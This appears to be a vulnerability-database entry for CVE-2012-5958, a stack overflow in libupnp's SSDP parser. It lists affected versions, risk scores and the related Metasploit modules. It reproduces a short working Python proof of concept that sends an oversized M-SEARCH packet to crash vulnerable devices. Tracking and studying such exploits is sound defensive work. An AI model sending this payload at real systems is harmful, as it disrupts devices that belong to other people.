CVE-2012-5958

critical

Published 2013-01-31 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a UDP packet with a crafted string that is not properly handled after a certain pointer subtraction.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-24455 remote unix verified

Metasploit · 2013-02-05

Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit)

Source code queued for fetch — refresh in a moment.

EDB-49119 dos linux python · 1 KB

Patrik Lantz · 2020-11-27

libupnp 1.6.18 - Stack-based buffer overflow (DoS)

python exploit Source: Exploit-DB

# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958

import socket

payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"

byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))

Metasploit modules

exploit_multi/upnp/libupnp_ssdp_overflow rank 300

Portable UPnP SDK unique_service_name() Remote Code Execution

Source fetch failed: fetch_error — view the original via the link above.

auxiliary_scanner/upnp/ssdp_msearch rank 300

UPnP SSDP M-SEARCH Information Discovery

Source fetch failed: fetch_error — view the original via the link above.

Application impact

Vendor	Product	Versions
libupnp_project	libupnp	`{"endIncluding":"1.6.17"}`
libupnp_project	libupnp	`1.4.0`
libupnp_project	libupnp	`1.4.1`
libupnp_project	libupnp	`1.4.2`
libupnp_project	libupnp	`1.4.3`
libupnp_project	libupnp	`1.4.4`
libupnp_project	libupnp	`1.4.5`
libupnp_project	libupnp	`1.4.6`
libupnp_project	libupnp	`1.4.7`
libupnp_project	libupnp	`1.6.0`
libupnp_project	libupnp	`1.6.1`
libupnp_project	libupnp	`1.6.2`
libupnp_project	libupnp	`1.6.3`
libupnp_project	libupnp	`1.6.4`
libupnp_project	libupnp	`1.6.5`
libupnp_project	libupnp	`1.6.6`
libupnp_project	libupnp	`1.6.7`
libupnp_project	libupnp	`1.6.8`
libupnp_project	libupnp	`1.6.9`
libupnp_project	libupnp	`1.6.10`
libupnp_project	libupnp	`1.6.11`
libupnp_project	libupnp	`1.6.12`
libupnp_project	libupnp	`1.6.13`
libupnp_project	libupnp	`1.6.14`
libupnp_project	libupnp	`1.6.15`
libupnp_project	libupnp	`1.6.16`

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.